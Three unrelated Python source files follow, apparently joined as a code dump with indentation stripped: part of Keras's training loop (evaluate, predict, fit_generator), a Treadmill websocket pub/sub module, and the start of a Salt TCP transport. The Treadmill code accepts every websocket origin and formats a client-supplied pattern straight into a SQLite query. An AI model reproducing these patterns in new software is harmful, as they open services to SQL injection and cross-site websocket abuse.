If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare inputs, delegate logic to _test_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
'''Generates output predictions for the input samples,
processing the samples in a batched way.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple outputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A Numpy array of predictions.
'''
# validate user data
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# prepare inputs, delegate logic to _predict_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
'''Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
'''Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
'''Returns predictions for a single batch of samples.
'''
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, callbacks=[],
validation_data=None, nb_val_samples=None,
class_weight={}, max_q_size=10, nb_worker=1, pickle_safe=False,
initial_epoch=0):
'''Fits the model on data generated batch-by-batch by
a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
nb_val_samples: only relevant if `validation_data` is a generator.
number of samples to use from validation generator
at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
'''
wait_time = 0.01 # in seconds
epoch = initial_epoch
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise Exception('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
out_labels = self.metrics_names
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise Exception('validation_data should be a tuple '
'(val_x, val_y, val_sample_weight) '
'or (val_x, val_y). Found: ' + str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
self.validation_data = val_x + [val_y, val_sample_weights]
else:
self.validation_data = None
# start generator thread storing batches into a queue
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
callback_model.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
# build batch logs
batch_logs = {}
if type(x) is list:
batch_size = x[0].shape[0]
elif type(x) is dict:
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
try:
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
except:
_stop.set()
raise
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen > samples_per_epoch:
warnings.warn('Epoch comprised more than '
'`samples_per_epoch` samples, '
'which might affect learning results. '
'Set `samples_per_epoch` correctly '
'to avoid this warning.')
if samples_seen >= samples_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(validation_data,
nb_val_samples,
max_q_size=max_q_size,
nb_worker=nb_worker,
pickle_safe=pickle_safe)
else:
# no need for try/except because
# data has already been validated
val_outs = self.evaluate(val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if type(val_outs) is not list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
callbacks.on_train_end()
return self.history
def evaluate_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Evaluates the model on a data generator. The generator should
return the same kind of data as accepted by `test_on_batch`.
Arguments:
generator:
generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
val_samples:
total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
self._make_test_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
weights = []
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
try:
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
all_outs.append(outs)
processed_samples += nb_samples
weights.append(nb_samples)
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
if type(outs) is not list:
return np.average(np.asarray(all_outs),
weights=weights)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=weights))
return averages
def predict_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: generator yielding batches of input samples.
val_samples: total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
Numpy array(s) of predictions.
'''
self._make_predict_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
else:
x = generator_output
try:
outs = self.predict_on_batch(x)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
if type(outs) != list:
outs = [outs]
if len(all_outs) == 0:
for out in outs:
shape = (val_samples,) + out.shape[1:]
all_outs.append(np.zeros(shape, dtype=K.floatx()))
for i, out in enumerate(outs):
all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
processed_samples += nb_samples
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
if len(all_outs) == 1:
return all_outs[0]
return all_outs
|
__init__.py
|
"""Websocket API.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import errno
import fnmatch
import glob
import heapq
import io
import json
import logging
import os
import re
import sqlite3
import threading
import time
import uuid
import tornado.websocket
import six
from six.moves import urllib_parse
from treadmill import dirwatch
from treadmill import utils
_LOGGER = logging.getLogger(__name__)
def make_handler(pubsub):
"""Make websocket handler factory."""
# pylint: disable=too-many-statements
class _WS(tornado.websocket.WebSocketHandler):
"""Base class contructor"""
def __init__(self, application, request, **kwargs):
"""Default constructor for tornado.websocket.WebSocketHandler"""
tornado.websocket.WebSocketHandler.__init__(
self, application, request, **kwargs
)
self._request_id = str(uuid.uuid4())
self._subscriptions = set()
def active(self, sub_id=None):
"""Return true if connection (and optional subscription) is active,
false otherwise.
If connection is not active, so are all of its subscriptions.
"""
if not self.ws_connection:
return False
return sub_id is None or sub_id in self._subscriptions
def open(self, *args, **kwargs):
"""Called when connection is opened.
Override if you want to do something else besides log the action.
"""
_LOGGER.info('[%s] Connection opened, remote ip: %s',
self._request_id, self.request.remote_ip)
def send_msg(self, msg):
"""Send message."""
_LOGGER.info('[%s] Sending message: %r', self._request_id, msg)
try:
self.write_message(msg)
except Exception: # pylint: disable=W0703
_LOGGER.exception('[%s] Error sending message: %r',
self._request_id, msg)
def send_error_msg(self, error_str, sub_id=None, close_conn=True):
"""Convenience method for logging and returning errors.
If sub_id is provided, it will be included in the error message and
subscription will be removed.
Note: this method will close the connection after sending back the
error, unless close_conn=False.
"""
error_msg = {'_error': error_str,
'when': time.time()}
if sub_id is not None:
error_msg['sub-id'] = sub_id
_LOGGER.info('[%s] Removing subscription %s',
self._request_id, sub_id)
try:
self._subscriptions.remove(sub_id)
except KeyError:
pass
self.send_msg(error_msg)
if close_conn:
_LOGGER.info('[%s] Closing connection.', self._request_id)
self.close()
def on_close(self):
"""Called when connection is closed.
Override if you want to do something else besides log the action.
"""
_LOGGER.info('[%s] Connection closed.', self._request_id)
def check_origin(self, origin):
"""Overriding check_origin method from base class.
This method returns true all the time.
"""
parsed_origin = urllib_parse.urlparse(origin)
_LOGGER.debug('parsed_origin: %r', parsed_origin)
return True
def on_message(self, message):
"""Manage event subscriptions."""
if not pubsub:
_LOGGER.fatal('pubsub is not configured, ignore.')
self.send_error_msg('Fatal: unexpected error', close_conn=True)
_LOGGER.info('[%s] Received message: %s',
self._request_id, message)
sub_id = None
close_conn = True
try:
sub_msg = json.loads(message)
sub_id = sub_msg.get('sub-id')
close_conn = sub_id is None
if sub_msg.get('unsubscribe') is True:
_LOGGER.info('[%s] Unsubscribing %s',
self._request_id, sub_id)
try:
self._subscriptions.remove(sub_id)
except KeyError:
self.send_error_msg(
'Invalid subscription: %s' % sub_id,
close_conn=False
)
return
if sub_id and sub_id in self._subscriptions:
self.send_error_msg(
'Subscription already exists: %s' % sub_id,
close_conn=False
)
return
topic = sub_msg.get('topic')
impl = pubsub.impl.get(topic)
if not impl:
self.send_error_msg(
'Invalid topic: %s' % topic,
sub_id=sub_id, close_conn=close_conn
)
return
subscription = impl.subscribe(sub_msg)
since = sub_msg.get('since', 0)
snapshot = sub_msg.get('snapshot', False)
if sub_id and not snapshot:
_LOGGER.info('[%s] Adding subscription %s',
self._request_id, sub_id)
self._subscriptions.add(sub_id)
for watch, pattern in subscription:
pubsub.register(watch, pattern, self, impl, since, sub_id)
if snapshot and close_conn:
_LOGGER.info('[%s] Closing connection.', self._request_id)
self.close()
except Exception as err: # pylint: disable=W0703
self.send_error_msg(str(err),
sub_id=sub_id, close_conn=close_conn)
def data_received(self, chunk):
"""Passthrough of abstract method data_received.
"""
def on_event(self, filename, operation, _content):
"""Default event handler."""
_LOGGER.debug('%s %s', filename, operation)
return {'time': time.time(),
'filename': filename,
'op': operation}
return _WS
class DirWatchPubSub:
"""Pubsub dirwatch events."""
def __init__(self, root, impl=None, watches=None):
self.root = os.path.realpath(root)
self.impl = impl or {}
self.watches = watches or []
self.watcher = dirwatch.DirWatcher()
self.watcher.on_created = self._on_created
self.watcher.on_deleted = self._on_deleted
self.watcher.on_modified = self._on_modified
self.watch_dirs = set()
for watch in self.watches:
watch_dirs = self._get_watch_dirs(watch)
self.watch_dirs.update(watch_dirs)
for directory in self.watch_dirs:
_LOGGER.info('Added permanent dir watcher: %s', directory)
self.watcher.add_dir(directory)
self.ws = make_handler(self)
self.handlers = collections.defaultdict(list)
def register(self, watch, pattern, ws_handler, impl, since, sub_id=None):
"""Register handler with pattern."""
watch_dirs = self._get_watch_dirs(watch)
for directory in watch_dirs:
if ((not self.handlers[directory] and
directory not in self.watch_dirs)):
_LOGGER.info('Added dir watcher: %s', directory)
self.watcher.add_dir(directory)
# Store pattern as precompiled regex.
pattern_re = re.compile(
fnmatch.translate(pattern)
)
self.handlers[directory].append(
(pattern_re, ws_handler, impl, sub_id)
)
self._sow(watch, pattern, since, ws_handler, impl, sub_id=sub_id)
def _get_watch_dirs(self, watch):
pathname = os.path.realpath(os.path.join(self.root, watch.lstrip('/')))
return [path for path in glob.glob(pathname) if os.path.isdir(path)]
@utils.exit_on_unhandled
def _on_created(self, path):
"""On file created callback."""
_LOGGER.debug('created: %s', path)
self._handle('c', path)
@utils.exit_on_unhandled
def _on_modified(self, path):
"""On file modified callback."""
_LOGGER.debug('modified: %s', path)
self._handle('m', path)
@utils.exit_on_unhandled
def _on_deleted(self, path):
"""On file deleted callback."""
_LOGGER.debug('deleted: %s', path)
self._handle('d', path)
def _handle(self, operation, path):
"""Get event data and notify interested handlers of the change."""
directory, filename = os.path.split(path)
# Ignore (.) files, as they are temporary or "system".
if filename[0] == '.':
return
directory_handlers = self.handlers.get(directory, [])
handlers = [
(handler, impl, sub_id)
for pattern_re, handler, impl, sub_id in directory_handlers
if (handler.active(sub_id=sub_id) and
pattern_re.match(filename))
]
if not handlers:
return
if operation == 'd':
when = time.time()
content = None
else:
if '/trace/' in path or '/server-trace/' in path:
# Specialized handling of trace files (no need to stat/read).
# If file was already deleted (trace cleanup), don't ignore it.
_, timestamp, _ = filename.split(',', 2)
when, content = float(timestamp), ''
else:
try:
when = os.stat(path).st_mtime
with io.open(path) as f:
content = f.read()
except (IOError, OSError) as err:
if err.errno == errno.ENOENT:
# If file was already deleted, ignore.
# It will be handled as 'd'.
return
raise
self._notify(handlers, path, operation, content, when)
def _notify(self, handlers, path, operation, content, when):
"""Notify interested handlers of the change."""
root_len = len(self.root)
for handler, impl, sub_id in handlers:
try:
payload = impl.on_event(path[root_len:],
operation,
content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
handler.send_msg(payload)
except Exception as err: # pylint: disable=broad-except
_LOGGER.exception('Error handling event: %s, %s, %s, %s, %s',
path, operation, content, when, sub_id)
handler.send_error_msg(
'{cls}: {err}'.format(
cls=type(err).__name__,
err=str(err)
),
sub_id=sub_id,
close_conn=sub_id is None
)
def _db_records(self, db_path, sow_table, watch, pattern, since):
"""Get matching records from db."""
# if file does not exist, do not try to open it. Opening connection
# will create the file, there is no way to prevent this from
# happening until py3.
#
if not os.path.exists(db_path):
_LOGGER.info('Ignore deleted db: %s', db_path)
return (None, None)
# There is rare condition that the db file is deleted HERE. In this
# case connection will be open, but the tables will not be there.
conn = sqlite3.connect(db_path)
# Before Python 3.7 GLOB pattern must not be parametrized to use index.
select_stmt = """
SELECT timestamp, path, data FROM %s
WHERE directory GLOB ? AND name GLOB '%s' AND timestamp >= ?
ORDER BY timestamp
""" % (sow_table, pattern)
# Return open connection, as conn.execute is cursor iterator, not
# materialized list.
try:
return conn, conn.execute(select_stmt, (watch, since,))
except sqlite3.OperationalError as db_err:
# Not sure if the file needs to be deleted at this point. As
# sow_table is a parameter, passing non-existing table can cause
# legit file to be deleted.
_LOGGER.info('Unable to execute: select from %s:%s ..., %s',
db_path, sow_table, str(db_err))
conn.close()
return (None, None)
def _sow(self, watch, pattern, since, handler, impl, sub_id=None):
"""Publish state of the world."""
if since is None:
since = 0
def _publish(item):
when, path, content = item
try:
payload = impl.on_event(str(path), None, content)
if payload is not None:
payload['when'] = when
if sub_id is not None:
payload['sub-id'] = sub_id
handler.send_msg(payload)
except Exception as err: # pylint: disable=W0703
_LOGGER.exception('Error handling sow event: %s, %s, %s, %s',
path, content, when, sub_id)
handler.send_error_msg(str(err), sub_id=sub_id)
db_connections = []
fs_records = self._get_fs_sow(watch, pattern, since)
sow = getattr(impl, 'sow', None)
sow_table = getattr(impl, 'sow_table', 'sow')
try:
records = []
if sow:
dbs = sorted(glob.glob(os.path.join(self.root, sow, '*')))
for db in dbs:
if os.path.basename(db).startswith('.'):
continue
conn, db_cursor = self._db_records(
db, sow_table, watch, pattern, since
)
if db_cursor:
records.append(db_cursor)
# FIXME: Figure out pylint use before assign
#
# pylint: disable=E0601
if conn:
db_connections.append(conn)
records.append(fs_records)
# Merge db and fs records, removing duplicates.
prev_path = None
for item in heapq.merge(*records):
_when, path, _content = item
if path == prev_path:
continue
prev_path = path
_publish(item)
finally:
for conn in db_connections:
if conn:
conn.close()
def _get_fs_sow(self, watch, pattern, since):
"""Get state of the world from filesystem."""
root_len = len(self.root)
fs_glob = os.path.join(self.root, watch.lstrip('/'), pattern)
files = glob.glob(fs_glob)
items = []
for filename in files:
try:
stat = os.stat(filename)
with io.open(filename) as f:
content = f.read()
if stat.st_mtime >= since:
path, when = filename[root_len:], stat.st_mtime
items.append((when, path, content))
except (IOError, OSError) as err:
# Ignore deleted files.
if err.errno != errno.ENOENT:
raise
return sorted(items)
def _gc(self):
"""Remove disconnected websocket handlers."""
for directory in list(six.viewkeys(self.handlers)):
handlers = [
(pattern, handler, impl, sub_id)
for pattern, handler, impl, sub_id in self.handlers[directory]
if handler.active(sub_id=sub_id)
]
_LOGGER.info('Number of active handlers for %s: %s',
directory, len(handlers))
if not handlers:
_LOGGER.info('No active handlers for %s', directory)
self.handlers.pop(directory, None)
if directory not in self.watch_dirs:
# Watch is not permanent, remove dir from watcher.
self.watcher.remove_dir(directory)
else:
self.handlers[directory] = handlers
@utils.exit_on_unhandled
def run(self, once=False):
"""Run event loop."""
last_gc = time.time()
while True:
wait_interval = 10
if once:
wait_interval = 0
if self.watcher.wait_for_events(wait_interval):
self.watcher.process_events()
if (time.time() - last_gc) >= wait_interval:
self._gc()
last_gc = time.time()
if once:
break
@utils.exit_on_unhandled
def run_detached(self):
"""Run event loop in separate thread."""
event_thread = threading.Thread(target=self.run)
event_thread.daemon = True
event_thread.start()
|
tcp.py
|
"""
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
"""
import errno
import logging
import os
import queue
import socket
import threading
import urllib
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.iostream
import salt.ext.tornado.netutil
import salt.ext.tornado.tcpclient
import salt.ext.tornado.tcpserver
import salt.master
import salt.payload
import salt.transport.client
import salt.transport.frame
import salt.transport.ipc
import salt.transport.server
import salt.utils.asynchronous
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.versions
from salt.exceptions import SaltClientError, SaltReqTimeoutError
if salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import salt.ext.tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
class ClosingError(Exception):
""" """
def _set_tcp_keepalive(sock, opts):
"""
Ensure that TCP keepalives are set for the socket.
"""
if hasattr(socket, "SO_KEEPALIVE"):
if opts.get("tcp_keepalive", False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, "SOL_TCP"):
if hasattr(socket, "TCP_KEEPIDLE"):
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE, int(tcp_keepalive_idle)
)
if hasattr(socket, "TCP_KEEPCNT"):
tcp_keepalive_cnt = opts.get("tcp_keepalive_cnt", -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT, int(tcp_keepalive_cnt)
)
if hasattr(socket, "TCP_KEEPINTVL"):
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP,
socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl),
)
if hasattr(socket, "SIO_KEEPALIVE_VALS"):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(
socket.SIO_KEEPALIVE_VALS,
(
1,
int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000),
),
)
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
"""
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
"""
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super().__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
"""
Start the load balancer
"""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except OSError as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if (
salt.ext.tornado.util.errno_from_exception(e)
== errno.ECONNABORTED
):
continue
raise
class Resolver:
_resolver_configured = False
@classmethod
def _config_resolver(cls, num_threads=10):
salt.ext.tornado.netutil.Resolver.configure(
"salt.ext.tornado.netutil.ThreadedResolver", num_threads=num_threads
)
cls._resolver_configured = True
def __init__(self, *args, **kwargs):
if not self._resolver_configured:
# TODO: add opt to specify number of resolver threads
self._config_resolver()
class TCPPubClient(salt.transport.base.PublishClient):
"""
Tornado based TCP Pub Client
"""
ttype = "tcp"
def __init__(self, opts, io_loop, **kwargs): # pylint: disable=W0231
self.opts = opts
self.io_loop = io_loop
self.message_client = None
self.connected = False
self._closing = False
self.resolver = Resolver()
def close(self):
if self._closing:
return
self._closing = True
if self.message_client is not None:
self.message_client.close()
self.message_client = None
# pylint: disable=W1701
def __del__(self):
self.close()
